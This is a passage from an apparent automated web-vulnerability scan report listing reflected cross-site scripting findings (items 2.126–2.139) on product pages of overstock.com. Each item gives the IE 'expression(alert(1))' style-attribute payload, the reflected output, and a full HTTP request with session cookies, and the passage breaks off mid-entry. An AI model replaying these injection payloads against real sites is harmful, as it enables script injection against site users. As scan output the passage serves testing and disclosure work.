This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/Farouk-CHI-Shooting-Star-to-Earth-1-inch-Styling-Iron-with-Organic-CHI-Oil/4123482/product.html?bd8a1"style%3d"x%3aexpression(alert(1))"a3062c1c785=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.126. http://www.overstock.com/Health-Beauty/Moroccan-Oil-3.4-oz-Hair-Treatment/4494882/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d9a5"style%3d"x%3aexpression(alert(1))"e54cec266ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d9a5"style="x:expression(alert(1))"e54cec266ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/Moroccan-Oil-3.4-oz-Hair-Treatment/4494882/product.html?3d9a5"style%3d"x%3aexpression(alert(1))"e54cec266ec=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.127. http://www.overstock.com/Health-Beauty/Pollenex-by-Conair-Flexible-Teak-Shower-Mat/4413244/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abdaf"style%3d"x%3aexpression(alert(1))"fdebb58eab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as abdaf"style="x:expression(alert(1))"fdebb58eab4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/Pollenex-by-Conair-Flexible-Teak-Shower-Mat/4413244/product.html?abdaf"style%3d"x%3aexpression(alert(1))"fdebb58eab4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.128. http://www.overstock.com/Health-Beauty/i.d.-Bare-Escentuals-100-percent-Pure-Moxie-Makeup-Kit/3930813/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31339"style%3d"x%3aexpression(alert(1))"ef7f3945ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31339"style="x:expression(alert(1))"ef7f3945ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Health-Beauty/i.d.-Bare-Escentuals-100-percent-Pure-Moxie-Makeup-Kit/3930813/product.html?31339"style%3d"x%3aexpression(alert(1))"ef7f3945ed=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.129. http://www.overstock.com/Home-Garden/24-inch-Espresso-Brown-Leather-Counter-height-Saddle-Bar-Stools-Set-of-2/5039833/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd24"style%3d"x%3aexpression(alert(1))"c01130ffe12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cd24"style="x:expression(alert(1))"c01130ffe12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/24-inch-Espresso-Brown-Leather-Counter-height-Saddle-Bar-Stools-Set-of-2/5039833/product.html?2cd24"style%3d"x%3aexpression(alert(1))"c01130ffe12=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.130. http://www.overstock.com/Home-Garden/A-Walk-in-the-Rain-Hand-painted-Canvas-Art-Set/5105715/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73179"style%3d"x%3aexpression(alert(1))"859c5084c71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73179"style="x:expression(alert(1))"859c5084c71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/A-Walk-in-the-Rain-Hand-painted-Canvas-Art-Set/5105715/product.html?73179"style%3d"x%3aexpression(alert(1))"859c5084c71=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bbb9"style%3d"x%3aexpression(alert(1))"cc60dc457f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bbb9"style="x:expression(alert(1))"cc60dc457f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/A-frame-Espresso-Desk/4042651/product.html?3bbb9"style%3d"x%3aexpression(alert(1))"cc60dc457f9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.132. http://www.overstock.com/Home-Garden/ATH-Home-Bath-Space-Savers/4429367/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5723"style%3d"x%3aexpression(alert(1))"dc27975fdfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5723"style="x:expression(alert(1))"dc27975fdfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/ATH-Home-Bath-Space-Savers/4429367/product.html?a5723"style%3d"x%3aexpression(alert(1))"dc27975fdfa=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.133. http://www.overstock.com/Home-Garden/Abstract-Hand-painted-Oil-on-Canvas-Art-Set/4324396/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecce7"style%3d"x%3aexpression(alert(1))"5e9cdf261eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ecce7"style="x:expression(alert(1))"5e9cdf261eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Abstract-Hand-painted-Oil-on-Canvas-Art-Set/4324396/product.html?ecce7"style%3d"x%3aexpression(alert(1))"5e9cdf261eb=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8923f"style%3d"x%3aexpression(alert(1))"85ef6a8bd2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8923f"style="x:expression(alert(1))"85ef6a8bd2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Abstract-Wall-Art/2036145/product.html?8923f"style%3d"x%3aexpression(alert(1))"85ef6a8bd2d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.135. http://www.overstock.com/Home-Garden/Algreen-Cascata-65-gallon-Rain-Water-Collection-System/4408338/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c15b"style%3d"x%3aexpression(alert(1))"e9ad1dd2c4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c15b"style="x:expression(alert(1))"e9ad1dd2c4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Algreen-Cascata-65-gallon-Rain-Water-Collection-System/4408338/product.html?5c15b"style%3d"x%3aexpression(alert(1))"e9ad1dd2c4b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.136. http://www.overstock.com/Home-Garden/All-Directional-Chrome-Showerhead/4688005/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af6c"style%3d"x%3aexpression(alert(1))"c395720b29e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af6c"style="x:expression(alert(1))"c395720b29e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/All-Directional-Chrome-Showerhead/4688005/product.html?8af6c"style%3d"x%3aexpression(alert(1))"c395720b29e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.137. http://www.overstock.com/Home-Garden/All-Seasons-Down-Alternative-Microfiber-Blanket/4081645/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4400"style%3d"x%3aexpression(alert(1))"9ea5e34285 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4400"style="x:expression(alert(1))"9ea5e34285 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/All-Seasons-Down-Alternative-Microfiber-Blanket/4081645/product.html?e4400"style%3d"x%3aexpression(alert(1))"9ea5e34285=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.138. http://www.overstock.com/Home-Garden/All-season-Luxurious-Down-Alternative-Comforter/3297897/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93008"style%3d"x%3aexpression(alert(1))"f9f5845dae2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93008"style="x:expression(alert(1))"f9f5845dae2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/All-season-Luxurious-Down-Alternative-Comforter/3297897/product.html?93008"style%3d"x%3aexpression(alert(1))"f9f5845dae2=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.139. http://www.overstock.com/Home-Garden/American-Atelier-16-piece-Abalone-Dinnerware-Set/5197520/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b828a"style%3d"x%3aexpression(alert(1))"fb590d8c4d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b828a"style="x:expression(alert(1))"fb590d8c4d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
